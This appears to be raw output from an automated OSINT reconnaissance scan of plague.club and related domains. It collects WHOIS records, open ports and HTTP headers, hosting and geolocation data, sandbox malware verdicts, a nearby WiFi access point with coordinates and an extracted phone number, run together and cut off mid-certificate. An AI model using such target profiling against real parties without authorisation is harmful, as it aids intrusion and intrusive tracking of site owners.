This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion.

Domain name: plague.club
Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-03-15T06:18:37.01Z
Creation Date: 2020-04-14T23:55:11.78Z
Registrar Registration Expiration Date: 2023-04-14T23:55:11.78Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:
116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2022-12-17T12:31:04.11Z <<<
For more information on Whois status codes, please visit https://icann.org/epp

2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None wobblyfalallogin00.fdawfa0002.repl.co 34.149.204.188

2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:2083 104.21.7.179

2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +14259744689
Domain Name: ZEROTWO-BEST-WAIFU.ONLINE
Registry Domain ID: D266274377-CNIC
Registrar WHOIS Server: whois.enom.com
Registrar URL: https://www.enom.com/
Updated Date: 2022-01-11T15:03:40.0Z
Creation Date: 2021-12-25T22:42:25.0Z
Registry Expiry Date: 2022-12-25T23:59:59.0Z
Registrar: eNom, Inc.
Registrar IANA ID: 48
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Data Protected
Registrant State/Province: WA
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.AMENWORLD.COM
Name Server: NS2.AMENWORLD.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: domainabuse@tucows.com
Registrar Abuse Contact Phone: +49.2283296859
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<<

The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance.

Domain Name: zerotwo-best-waifu.online
Registry Domain ID: D266274377-CNIC
Registrar WHOIS Server: WHOIS.ENOM.COM
Registrar URL: WWW.ENOM.COM
Updated Date: 2022-01-11T15:03:40.00Z
Creation Date: 2021-12-25T22:42:00.00Z
Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: ok https://www.icann.org/epp#ok
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street:
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Paris
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: FR
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin Street:
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Email: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech Street:
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Email: REDACTED FOR PRIVACY
Name Server: NS1.AMENWORLD.COM
Name Server: NS2.AMENWORLD.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: ABUSE@ENOM.COM
Registrar Abuse Contact Phone: +1.4259744689
URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/
>>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp

The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy.
By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.190.129 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None support@newtabwallpaperstheme.com
2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77ae3c3c5dd7e20a-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:09:33 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.11:443 188.114.96.0/24 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 2 0 1 0 None http://rasputain.fr/ rasputain.fr 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None redwood (Net ID: 00:01:38:85:C1:F8) 37.780462,-122.390564 2022-12-18 00:07:11 Raw
Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 3, u'search_terms': [{u'id': u'host', u'value': u'172.67.169.215'}], u'result': [{u'environment_id': 160, u'job_id': u'6398dde020bd5b786756929c', u'analysis_start_time': u'2022-12-13 20:17:45', u'vx_family': None, u'av_detect': u'4', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'Ledger-Setup_x86x64.exe', u'sha256': u'0f4aabac03b26d11ff91368f614b418e47891a908f4d8208fa0d360fef777a83', u'type': None, u'type_short': u'exe', u'size': 60883177}, {u'environment_id': 160, u'job_id': u'6398c973944b077d78332cc5', u'analysis_start_time': u'2022-12-13 18:50:41', u'vx_family': u'VHO:Trojan.MSIL.Exnet', u'av_detect': u'7', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'consolemeta.dll', u'sha256': u'aa606b7c7930a60ad0b6c3c830ef846c06bfa6edf26801d6e13b50ab3f7eaa00', u'type': None, u'type_short': u'exe', u'size': 60883177}, {u'environment_id': 100, u'job_id': u'61bcecd63f6824169173051f', u'analysis_start_time': u'2021-12-17 20:02:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'89e57cdb4dfb46a380e0a5d49f8c9b10150a0df2251c5a123f1d503456c08739', u'type': None, u'type_short': u'url', u'size': 39}]} 172.67.169.215 2022-12-18 00:20:44 Malicious IP on Same Subnet Yes CINS Army List 0 0 2 0 None cinsscore.com [20.192.0.0/10] http://cinsscore.com/list/ci-badguys.txt 20.192.0.0/10 2022-12-18 00:12:13 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', 
u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.96.1 2022-12-18 00:07:13 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None
172.67.169.215 2022-12-18 00:07:55 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.io plague.fun 2022-12-18 00:25:44 Affiliate - Internet Name No DNS Resolver 1 0 4 0 None ns.dominiando.uk 81.88.48.111 2022-12-18 00:21:47 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2ce24691b2ada-ORD Content-Encoding: gzip 2606:4700:3032::ac43:8925 2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 1 1 0 None Microsoft Azure: http://www.windowsazure.com/en-us/ 40.113.112.131 2022-12-18 00:18:13 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.4:8443 188.114.97.0/24 2022-12-18 00:24:54 Malicious IP Address Yes MetaDefender 0 0 1 0 None webroot.com [4.228.83.86] 4.228.83.86 2022-12-18 00:12:03 Physical Location No ipapi.co 1 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3031::ac43:93e6 2022-12-18 00:11:12 Similar Domain - Whois No Whois
1 0 2 0 None Domain Name: IFU.ONLINE Registry Domain ID: D9964885-CNIC Registrar WHOIS Server: whois.ascio.com Registrar URL: http://www.ascio.com Updated Date: 2022-11-17T12:11:40.0Z Creation Date: 2015-09-04T11:20:25.0Z Registry Expiry Date: 2023-09-04T23:59:59.0Z Registrar: Ascio Technologies Inc. Danmark - filial af Ascio Technologies Inc. USA Registrar IANA ID: 106 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Paul Bueetiger AG Registrant State/Province: Registrant Country: CH Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS.HOSTPOINT.CH Name Server: NS2.HOSTPOINT.CH Name Server: NS3.HOSTPOINT.CH DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@ascio.com Registrar Abuse Contact Phone: +1.4165350123 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:12.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. 
By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: ifu.online Registrar WHOIS Server: whois.ascio.com Registrar URL: http://www.ascio.com Updated Date: 2022-09-05T00:44:30Z Creation Date: 2015-09-04T11:20:25Z Registrar Registration Expiration Date: 2023-09-04T00:00:00Z Registrar: Ascio Technologies, Inc Registrar IANA ID: 106 Registrar Abuse Contact Email: abuse@ascio.com Registrar Abuse Contact Phone: +44 (20) 81583881 Domain Status: OK https://icann.org/epp#ok Registry Registrant ID: Not Disclosed Registrant Name: Not Disclosed Registrant Organization: Not Disclosed Registrant Street: Not Disclosed Registrant City: Not Disclosed Registrant State/Province: Registrant Postal Code: Not Disclosed Registrant Country: CH Registrant Phone: Not Disclosed Registrant Phone Ext: Not Disclosed Registrant Fax: Not Disclosed Registrant Fax Ext: Not Disclosed Registrant Email: https://whoiscontact.ascio.com?domainname=ifu.online Registry Admin ID: Not Disclosed Admin Name: Not Disclosed Admin Organization: Not Disclosed Admin Street: Not Disclosed Admin City: Not Disclosed Admin State/Province: Not Disclosed Admin Postal Code: Not Disclosed Admin Country: Not Disclosed Admin Phone: Not Disclosed Admin Phone Ext: Not Disclosed Admin Fax: Not Disclosed Admin Fax Ext: Not Disclosed Admin Email: Not Disclosed Registry Tech ID: Not Disclosed Tech Name: Not Disclosed Tech Organization: Not Disclosed 
Tech Street: Not Disclosed Tech City: Not Disclosed Tech State/Province: Not Disclosed Tech Postal Code: Not Disclosed Tech Country: Not Disclosed Tech Phone: Not Disclosed Tech Phone Ext: Not Disclosed Tech Fax: Not Disclosed Tech Fax Ext: Not Disclosed Tech Email: Not Disclosed Name Server: ns.hostpoint.ch Name Server: ns2.hostpoint.ch Name Server: ns3.hostpoint.ch DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf >>> Last update of WHOIS database: 2022-12-18T00:11:12Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in Ascio Technologies' WHOIS database is provided by Ascio Technologies for information purposes only. By submitting a WHOIS query, you agree that you will use this data only for lawful purpose. In addition, you agree not to: (a) use the data to allow, enable, or otherwise support any marketing activities, regardless of the medium used. Such media include but are not limited to e-mail, telephone, facsimile, postal mail, SMS, and wireless alerts; or (b) use the data to enable high volume, automated, electronic processes that send queries or data to the systems of any Registry Operator or ICANN-Accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. (c) sell or redistribute the data except insofar as it has been incorporated into a value-added product or service that does not permit the extraction of a substantial portion of the bulk data from the value-added product or service for use by other parties. Ascio Technologies reserves the right to modify these terms at any time. Ascio Technologies cannot guarantee the accuracy of the data provided. By accessing and using Ascio Technologies WHOIS service, you agree to these terms. 
Source Data: zerotwo-best-wa.ifu.online

Date Found: 2022-12-18 00:04:52 | Type: Raw Data from RIRs | Risky: No | Module: Hybrid Analysis | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.96.1/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.1:80"\n "104.18.31.78:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3512"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0_Mutex"\n "IsoScope_db8_IESQMMUTEX_0_303"\n "IsoScope_db8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_db8_ConnHashTable<3512>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003252]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003512]\n "0011OCN4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0011OCN4.txt]- [targetUID: 00000000-00003512]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003512]\n 
"~DFEC9FF18591CF0D57.TMP" has type "data"- Location: [%TEMP%\\~DFEC9FF18591CF0D57.TMP]- [targetUID: 00000000-00003512]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003512]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003512]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_71A2FDDC-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._6747C6ED-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFF697D7C0946BAA2.TMP" has type "data"- Location: [%TEMP%\\~DFFF697D7C0946BAA2.TMP]- [targetUID: 00000000-00003512]\n "W9XLKQJM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W9XLKQJM.txt]- [targetUID: 00000000-00003252]\n "~DF082348EE70E6B95F.TMP" has type "data"- Location: [%TEMP%\\~DF082348EE70E6B95F.TMP]- [targetUID: 00000000-00003512]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.1/"\n Pattern 
match: "http://188.114.96.1"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.1/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.18.31.78]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.96.1" found in string "http://188.114.96.1/"\n Potential IP "188.114.96.1" found in string "http://188.114.96.1"\n "188.114.96.1"\n Potential IP "188.114.96.1" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.96.1\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever 
launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'631a665717ba8f2f707e8915', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'188.114.96.1', u'104.18.31.78'], u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'sha512': u'eb35604cd28c8ce0c80d4c981d47a2cb14198c86708d81ff18d682cb3c8f73b6c54a53fb994dfc82e409c43bf662e908899d1a428a9dc656f1068281ac1049e1', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://188.114.96.1/', u'submission_id': u'631a665717ba8f2f707e8916', u'created_at': u'2022-09-08T22:01:59+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-08T22:02:00+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'0f5534822f97323db2ede42413f1e07d', u'network_mode': u'default', u'processes': [], u'sha1': u'd0e743b56365f07fe0e998a2fe5ecf2c66be6187', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}, {u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'http://188.114.96.1/', u'signatures': [], u'threat_level': 0, u'size': None, u'job_id': None, 
u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'sha512': u'eb35604cd28c8ce0c80d4c981d47a2cb14198c86708d81ff18d682cb3c8f73b6c54a53fb994dfc82e409c43bf662e908899d1a428a9dc656f1068281ac1049e1
Source Data: 188.114.96.1

Date Found: 2022-12-18 00:03:10 | Type: Internet Name - Unresolved | Risky: No | Module: DNS Resolver | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: plague.fun
Source Data:
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            04:6b:c5:5a:1c:aa:de:11:25:3a:85:ac:27:46:ac:84:c2:a9
        Signature Algorithm: ecdsa-with-SHA384
        Issuer: C=US, O=Let's Encrypt, CN=E1
        Validity
            Not Before: Oct 30 18:19:31 2022 GMT
            Not After : Jan 28 18:19:30 2023 GMT
        Subject: CN=*.plague.fun
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (256 bit)
                pub:
                    04:01:01:6e:30:77:4b:4a:76:be:97:94:3e:d7:af:
